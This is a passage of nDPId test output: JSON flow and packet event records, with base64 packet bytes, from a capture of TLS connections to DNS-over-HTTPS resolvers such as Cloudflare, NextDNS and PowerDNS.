5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcU